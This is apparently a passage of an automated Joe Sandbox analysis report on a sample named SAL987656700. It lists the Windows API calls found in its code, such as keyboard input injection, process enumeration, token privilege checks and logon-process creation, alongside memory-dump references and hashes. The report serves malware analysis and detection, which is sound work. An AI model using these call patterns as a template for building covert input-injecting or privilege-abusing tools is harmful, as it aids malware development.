                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: b0838ff4b834b1286241aca43a4b62a574b381b199e9250811bb8bfb0246aa78
                                      • Instruction ID: efddbb7d4c9e7d20ff880c6e55182d06ad593c37b5b626167a016f56628c490e
                                      • Opcode Fuzzy Hash: b0838ff4b834b1286241aca43a4b62a574b381b199e9250811bb8bfb0246aa78
                                      • Instruction Fuzzy Hash: 98510974A00209AFDF14DF68D980AEE7BB9FB45360F108569F865DB2A0D770ED82DB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008F5783
                                      • GetLastError.KERNEL32(?,00000000), ref: 008F57A9
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008F57CE
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008F57FA
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,008A6D71,00000000,00000000,008A82D9,?,008A82D9,?,00000001,008A6D71,8BE85006,00000001,008A82D9,008A82D9), ref: 008BD910
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008BD999
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008BD9AB
                                      • __freea.LIBCMT ref: 008BD9B4
                                        • Part of subcall function 008B3820: RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      APIs
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00915352
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00915375
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00915382
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009153A8
                                      Similarity
                                      • API ID: LongWindow$InvalidateMessageRectSend
                                      • String ID:
                                      • API String ID: 3340791633-0
                                      APIs
                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 008EABF1
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 008EAC0D
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 008EAC74
                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 008EACC6
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 0091769A
                                      • GetWindowRect.USER32(?,?), ref: 00917710
                                      • PtInRect.USER32(?,?,00918B89), ref: 00917720
                                      • MessageBeep.USER32(00000000), ref: 0091778C
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 009116EB
                                        • Part of subcall function 008E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008E3A57
                                        • Part of subcall function 008E3A3D: GetCurrentThreadId.KERNEL32 ref: 008E3A5E
                                        • Part of subcall function 008E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008E25B3), ref: 008E3A65
                                      • GetCaretPos.USER32(?), ref: 009116FF
                                      • ClientToScreen.USER32(00000000,?), ref: 0091174C
                                      • GetForegroundWindow.USER32 ref: 00911752
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 008ED501
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 008ED50F
                                      • Process32NextW.KERNEL32(00000000,?), ref: 008ED52F
                                      • CloseHandle.KERNEL32(00000000), ref: 008ED5DC
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,0091CB68), ref: 008ED2FB
                                      • GetLastError.KERNEL32 ref: 008ED30A
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008ED319
                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0091CB68), ref: 008ED376
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                      • String ID:
                                      • API String ID: 2267087916-0
                                      APIs
                                        • Part of subcall function 008E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008E102A
                                        • Part of subcall function 008E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008E1036
                                        • Part of subcall function 008E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E1045
                                        • Part of subcall function 008E1014: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008E104C
                                        • Part of subcall function 008E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E1062
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008E15BE
                                      • _memcmp.LIBVCRUNTIME ref: 008E15E1
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E1617
                                      • HeapFree.KERNEL32(00000000), ref: 008E161E
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 2182266621-0
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0091280A
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00912824
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00912832
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00912840
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      APIs
                                        • Part of subcall function 008E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,008E790A,?,000000FF,?,008E8754,00000000,?,0000001C,?,?), ref: 008E8D8C
                                        • Part of subcall function 008E8D7D: lstrcpyW.KERNEL32(00000000,?,?,008E790A,?,000000FF,?,008E8754,00000000,?,0000001C,?,?,00000000), ref: 008E8DB2
                                        • Part of subcall function 008E8D7D: lstrcmpiW.KERNEL32(00000000,?,008E790A,?,000000FF,?,008E8754,00000000,?,0000001C,?,?), ref: 008E8DE3
                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,008E8754,00000000,?,0000001C,?,?,00000000), ref: 008E7923
                                      • lstrcpyW.KERNEL32(00000000,?,?,008E8754,00000000,?,0000001C,?,?,00000000), ref: 008E7949
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,008E8754,00000000,?,0000001C,?,?,00000000), ref: 008E7984
                                      Strings
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      APIs
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00917D0B
                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00917D2A
                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00917D42
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008FB7AD,00000000), ref: 00917D6B
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID:
                                      • API String ID: 847901565-0
                                      • Opcode ID: 91c9e6096b34af5c2a69209ce74ea5cd986a6f7d91ed026f2d955bbad136026e
                                      • Instruction ID: 007a09edfd3778ecf72f0d59d2c49b452009a18482aff39cf82e905592225be5
                                      • Opcode Fuzzy Hash: 91c9e6096b34af5c2a69209ce74ea5cd986a6f7d91ed026f2d955bbad136026e
                                      • Instruction Fuzzy Hash: 9311C07531861AAFCB109F68EC04AE67BA9AF45364F158724F835C72F0D7308990DB90
                                      APIs
                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 009156BB
                                      • _wcslen.LIBCMT ref: 009156CD
                                      • _wcslen.LIBCMT ref: 009156D8
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00915816
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend_wcslen
                                      • String ID:
                                      • API String ID: 455545452-0
                                      • Opcode ID: 42b3ee252756f22ca59bf9e7699badea4cbb528f49b051e185c2f2df1c4601ca
                                      • Instruction ID: 01ae2534a09b5ffa3d11324c8b40c3937207042aeaf6f4f787e73eb40f11859b
                                      • Opcode Fuzzy Hash: 42b3ee252756f22ca59bf9e7699badea4cbb528f49b051e185c2f2df1c4601ca
                                      • Instruction Fuzzy Hash: 0011E17170060CDADF209F66CC81AEE77ACEF913A4F524426F915D6091E7748AC0CBA1
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008E14FF
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 008E1506
                                      • CloseHandle.KERNEL32(00000004), ref: 008E1520
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008E154F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 2621361867-0
                                      • Opcode ID: 4cebfa33414c8e0c9f468e95ef703bdf2bf5275dba6cd0b0b408a25422208a7c
                                      • Instruction ID: 79ab608533d8f1f487975724a86f3f87f22432f4d39473a1f582c5b4c855a58d
                                      • Opcode Fuzzy Hash: 4cebfa33414c8e0c9f468e95ef703bdf2bf5275dba6cd0b0b408a25422208a7c
                                      • Instruction Fuzzy Hash: A2115CB260424DABDF118F94DD49BDE7BA9FF49708F048014FA05E21A0C3718E61EB60
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 008E1A47
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E1A59
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E1A6F
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E1A8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 4811b50233b8ea08c3d36cd5d8f5b2c0944b351eb99f1632f85b321c84323a29
                                      • Instruction ID: 55626c98e512d1fc36bcbca77656d17ff3acff50aaaa0a402a94f19c7fd3d643
                                      • Opcode Fuzzy Hash: 4811b50233b8ea08c3d36cd5d8f5b2c0944b351eb99f1632f85b321c84323a29
                                      • Instruction Fuzzy Hash: 83112A3A901229FFEF109BA5C985FADBB78FB04750F2000A1EA00B7290D7716E50DB94
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 008EE1FD
                                      • MessageBoxW.USER32(?,?,?,?), ref: 008EE230
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008EE246
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008EE24D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      • Opcode ID: 45b4d4511db5a025af952782f13bd924a23fce761acf204c32463c88474b05c3
                                      • Instruction ID: 16fbe46ac6deffde204d78cc83821903585b423eaea991f0844385267e37e708
                                      • Opcode Fuzzy Hash: 45b4d4511db5a025af952782f13bd924a23fce761acf204c32463c88474b05c3
                                      • Instruction Fuzzy Hash: 17112BB6E18358BBC7019FA99C05BDE7FACEB46311F008215F924E3290D2B0CD04D7A0
                                      APIs
                                      • CreateThread.KERNEL32(00000000,?,008ACFF9,00000000,00000004,00000000), ref: 008AD218
                                      • GetLastError.KERNEL32 ref: 008AD224
                                      • __dosmaperr.LIBCMT ref: 008AD22B
                                      • ResumeThread.KERNEL32(00000000), ref: 008AD249
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                      • String ID:
                                      • API String ID: 173952441-0
                                      • Opcode ID: fc8941fd871ee98d3f3e9e8cb0f6e56ccc6012a2c1cd7e39e3a787ca1b60b7f4
                                      • Instruction ID: 9cfe09f81ffd9c3e32d5e909a491bf1efe2b34243035b0eddab892e0649bb769
                                      • Opcode Fuzzy Hash: fc8941fd871ee98d3f3e9e8cb0f6e56ccc6012a2c1cd7e39e3a787ca1b60b7f4
                                      • Instruction Fuzzy Hash: 0B012676504308BBE7106BA9DC09BAE7A68FF83330F104229F926D29D0DFB0D801C6A1
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0088604C
                                      • GetStockObject.GDI32(00000011), ref: 00886060
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0088606A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: d926bf662e995624b8a8d0dcfbf3c08c21d295e07289df8396571ccbae460ee4
                                      • Instruction ID: e689921893cac10b195ad7cec285553e1c2141a4802d480b04376e52063cbe46
                                      • Opcode Fuzzy Hash: d926bf662e995624b8a8d0dcfbf3c08c21d295e07289df8396571ccbae460ee4
                                      • Instruction Fuzzy Hash: C211C4B2205908BFEF125F94DC54FEA7B69FF183A4F004105FA04A2120D732DC60EB91
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 008A3B56
                                        • Part of subcall function 008A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 008A3AD2
                                        • Part of subcall function 008A3AA3: ___AdjustPointer.LIBCMT ref: 008A3AED
                                      • _UnwindNestedFrames.LIBCMT ref: 008A3B6B
                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 008A3B7C
                                      • CallCatchBlock.LIBVCRUNTIME ref: 008A3BA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                      • String ID:
                                      • API String ID: 737400349-0
                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                      • Instruction ID: cbd31d306e44f46b4bb01f8b2e77d4f798fb6ccaba96133078a071035dbf21be
                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                      • Instruction Fuzzy Hash: 2B014C32100148BBEF125E99DC42EEB7F6EFF8A764F044014FE48A6521C772E961DBA1
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008813C6,00000000,00000000,?,008B301A,008813C6,00000000,00000000,00000000,?,008B328B,00000006,FlsSetValue), ref: 008B30A5
                                      • GetLastError.KERNEL32(?,008B301A,008813C6,00000000,00000000,00000000,?,008B328B,00000006,FlsSetValue,00922290,FlsSetValue,00000000,00000364,?,008B2E46), ref: 008B30B1
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008B301A,008813C6,00000000,00000000,00000000,?,008B328B,00000006,FlsSetValue,00922290,FlsSetValue,00000000), ref: 008B30BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 48cd93a4e865bec8153790bb6f6a26dd1e71e92cdf7a5b1e05e7fe8f5cc04f4d
                                      • Instruction ID: d1239b2918e4cbbac7e217198895567082d08f780c299b47c254500ef7f4365c
                                      • Opcode Fuzzy Hash: 48cd93a4e865bec8153790bb6f6a26dd1e71e92cdf7a5b1e05e7fe8f5cc04f4d
                                      • Instruction Fuzzy Hash: 6A01D476759A26ABCB315A79AC449D77B98FF45B61B204620F916E3240CB21D902C6E0
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 008E747F
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008E7497
                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008E74AC
                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008E74CA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Type$Register$FileLoadModuleNameUser
                                      • String ID:
                                      • API String ID: 1352324309-0
                                      • Opcode ID: 8ac0c077d15ede32f758c9049d10faa022a485f255b268a7cec988c53b3a059f
                                      • Instruction ID: 202aa587b4c20e2ede52d8ff00e0b5ce4c1d011a29251809d7f007be8a755620
                                      • Opcode Fuzzy Hash: 8ac0c077d15ede32f758c9049d10faa022a485f255b268a7cec988c53b3a059f
                                      • Instruction Fuzzy Hash: 34118BB5349359ABE7208F15EC08B927BFCFB01B08F108569AA16DA1D1D7B0E944DB64
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008EACD3,?,00008000), ref: 008EB0C4
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008EACD3,?,00008000), ref: 008EB0E9
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,008EACD3,?,00008000), ref: 008EB0F3
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,008EACD3,?,00008000), ref: 008EB126
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
